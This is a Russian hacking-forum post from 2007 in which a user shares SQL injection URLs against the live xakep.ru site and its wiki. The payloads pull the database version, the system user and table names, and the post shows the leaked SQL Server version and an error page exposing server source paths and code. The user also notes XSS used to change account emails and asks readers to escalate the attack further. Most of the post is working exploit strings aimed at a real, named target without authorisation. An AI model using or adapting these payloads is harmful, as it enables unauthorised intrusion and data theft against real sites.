ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу хакер.ru
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

хакер.ru
  #1  
Старый 05.10.2007, 22:08
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию хакер.ru
вот подборка по ресурсу ХАКЕР.ru.. мо что-то интересное получится

SQL-injection

скуля вполне рабочая вот только с таблици достать не получилось.. так версия, юзер и тд
Цитата:
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(@@VE RSION+as+nv

archar))--&site=xakep
Microsoft SQL Server 2005 - 9.

Цитата:
http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast(syst em_user+as+

nvarchar))--&site=xakep
system_user

ну вот что-то посерьезнее вытянуть очень тяжело
тут еще и второй параметр уязвим))

http://www.xakep.ru/local/admin/voter.asp?action=remove&filedir=1'+or+1=(cast((SEL ECT+TOP+1+T

ABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)+as+nvarc har))--&site=xakep
http://xakep.ru/local/admin/voter.asp?action=add&filedir=38150&site=xakep'%20o r%201=@@version
--

Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Server Error

Цитата:
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec

%fb'+and+1=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%ce%ef%e5%f0%e0%f6%e8%ee%ed%ed%fb%e 5%20%f1%e8%f1%f2%e5%ec

%fb'%20and%201=1--
http://wiki.xakep.ru/Pages.aspx?Cat=%c8%ed%f2%e5%f0%ed%e5%f2%3Cb%3Eaaa% 3C/b%3E
PHP код:
Line 58:             if (Request["Cat"] != null ? !Request["Cat"].Equals("-") : false
Line 59:                 category Request["Cat"].ToString();
Line 60:             DataTable ds Pages.Instance.DataPages((SessionFacade.Published 

0), category);
Line 61:             AllRows ds.Rows.Count;
Line 62:             DataGrid1.DataSource ds.DefaultView;
Source Filed:\morazm\www\wiki\xakep\Pages.aspx.cs    Line60 
з.ы. когда-то мыла можно было изменять через ксс потом прикрили... теперь вот опять можна
http://wiki.xakep.ru/Profile.aspx
з.з.ы еще где то в теме с пасивками лежит пасивка на хакере /*раньше работало)*/

тут еще с типами боянчег
Цитата:
http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa'--&year=2007

кто сможет раскрутить на что-то нормальное (:
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ